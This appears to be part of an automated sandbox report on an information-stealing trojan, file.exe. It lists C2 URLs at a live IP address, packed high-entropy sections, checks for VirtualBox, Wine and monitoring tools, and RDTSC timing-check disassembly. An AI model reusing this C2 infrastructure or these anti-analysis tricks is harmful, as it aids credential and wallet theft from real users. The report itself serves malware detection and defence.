              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
              Source: file.exe, 00000000.00000002.2545709966.00000000013B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpo
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpser
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.1000d60be0de163924d/sqlite3.dllY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZG
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100DBG
              Source: file.exe, 00000000.00000002.2545709966.000000000136E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.100Dm
              Source: file.exe, 00000000.00000002.2544618204.0000000000A0D000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100Local
              Source: file.exe, 00000000.00000002.2544618204.0000000000861000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2544618204.000000000089C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://185.215.113.100s.exe
              Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exeStatic PE information: Section: cwrvobrg ZLIB complexity 0.9947073079619244
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/6@0/1
              Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\H1QKHLSH.htmJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2800
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1aba86ce-6dba-4936-a6d4-f5ef64b6e893Jump to behavior
              Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
              Source: file.exe, 00000000.00000002.2557920297.000000001D957000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
              Source: file.exeReversingLabs: Detection: 36%
              Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
              Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2800 -s 1544
              Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: file.exeStatic file information: File size 1830912 > 1048576
              Source: file.exeStatic PE information: Raw size of cwrvobrg is bigger than: 0x100000 < 0x1a7800

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.860000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cwrvobrg:EW;olxkocyk:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cwrvobrg:EW;olxkocyk:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: file.exeStatic PE information: real checksum: 0x1c8ac4 should be: 0x1bf150
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .rsrc
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: cwrvobrg
              Source: file.exeStatic PE information: section name: olxkocyk
              Source: file.exeStatic PE information: section name: .taggant
              Source: file.exeStatic PE information: section name: cwrvobrg entropy: 7.95287821777637

              Boot Survival

              barindex
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29852 second address: C29868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C29868 second address: C29884 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1F18DC15D0h 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28B5D second address: C28B63 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28B63 second address: C28B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28B69 second address: C28B85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1F1851F5E7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28B85 second address: C28B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1F18DC15C6h 0x0000000a popad 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C28CE0 second address: C28CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C290A1 second address: C290BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D8h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C290BD second address: C290EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E5h 0x00000007 jmp 00007F1F1851F5DEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C571 second address: C2C62B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D18F7h], ecx 0x0000002d jmp 00007F1F18DC15CAh 0x00000032 push 00000000h 0x00000034 jmp 00007F1F18DC15CFh 0x00000039 call 00007F1F18DC15C9h 0x0000003e push ecx 0x0000003f jnc 00007F1F18DC15DEh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 pushad 0x00000048 jmp 00007F1F18DC15D4h 0x0000004d jc 00007F1F18DC15C8h 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 mov eax, dword ptr [esp+04h] 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d jp 00007F1F18DC15C6h 0x00000063 pop ebx 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C62B second address: C2C65E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push ebx 0x0000000c jmp 00007F1F1851F5DFh 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1F1851F5DAh 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C65E second address: C2C6BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pop eax 0x0000000b push 00000003h 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007F1F18DC15C8h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 sub ecx, 74B0F2ACh 0x0000002f push 00000003h 0x00000031 add ecx, dword ptr [ebp+122D3689h] 0x00000037 call 00007F1F18DC15C9h 0x0000003c push ecx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C6BA second address: C2C6C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C7DA second address: C2C7DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C7DE second address: C2C87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1850h], esi 0x0000000e push 00000000h 0x00000010 jmp 00007F1F1851F5E1h 0x00000015 push 3AC3A203h 0x0000001a pushad 0x0000001b jmp 00007F1F1851F5DCh 0x00000020 pushad 0x00000021 push edx 0x00000022 pop edx 0x00000023 jmp 00007F1F1851F5E3h 0x00000028 popad 0x00000029 popad 0x0000002a xor dword ptr [esp], 3AC3A283h 0x00000031 mov ecx, esi 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push ecx 0x00000038 call 00007F1F1851F5D8h 0x0000003d pop ecx 0x0000003e mov dword ptr [esp+04h], ecx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc ecx 0x0000004b push ecx 0x0000004c ret 0x0000004d pop ecx 0x0000004e ret 0x0000004f mov ecx, dword ptr [ebp+122D3911h] 0x00000055 push 00000000h 0x00000057 mov edi, dword ptr [ebp+122D3789h] 0x0000005d push 00000003h 0x0000005f mov di, dx 0x00000062 call 00007F1F1851F5D9h 0x00000067 pushad 0x00000068 jnc 00007F1F1851F5DCh 0x0000006e push edi 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C87F second address: C2C8FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 jp 00007F1F18DC15E5h 0x0000000d pushad 0x0000000e jnc 00007F1F18DC15C6h 0x00000014 jmp 00007F1F18DC15D7h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e push edx 0x0000001f jmp 00007F1F18DC15D7h 0x00000024 pop edx 0x00000025 mov eax, dword ptr [eax] 0x00000027 jmp 00007F1F18DC15D4h 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F1F18DC15D9h 0x00000039 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C8FF second address: C2C905 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C905 second address: C2C90B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C90B second address: C2C90F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C90F second address: C2C94B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 cld 0x0000000a pushad 0x0000000b mov edx, 50169A55h 0x00000010 mov dword ptr [ebp+122D2E2Bh], ecx 0x00000016 popad 0x00000017 lea ebx, dword ptr [ebp+1245C451h] 0x0000001d push edx 0x0000001e mov ecx, dword ptr [ebp+122D37FDh] 0x00000024 pop ecx 0x00000025 xor cx, A680h 0x0000002a push eax 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F1F18DC15CEh 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C94B second address: C2C94F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2C9BD second address: C2C9FF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1F18DC15D7h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F1F18DC15CAh 0x00000013 jmp 00007F1F18DC15D8h 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2CAD8 second address: C2CADD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B676 second address: C4B68D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F1F18DC15CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B68D second address: C4B691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B691 second address: C4B695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B695 second address: C4B69B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B969 second address: C4B989 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1F18DC15C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push edi 0x0000000c jmp 00007F1F18DC15CEh 0x00000011 pop edi 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B989 second address: C4B98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4B98F second address: C4B995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BB29 second address: C4BB2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BB2D second address: C4BB31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCCE second address: C4BCEE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e je 00007F1F1851F5D6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BCEE second address: C4BCF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE51 second address: C4BE77 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F1851F5D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F1F1851F5E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jno 00007F1F1851F5D6h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4BE77 second address: C4BE7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
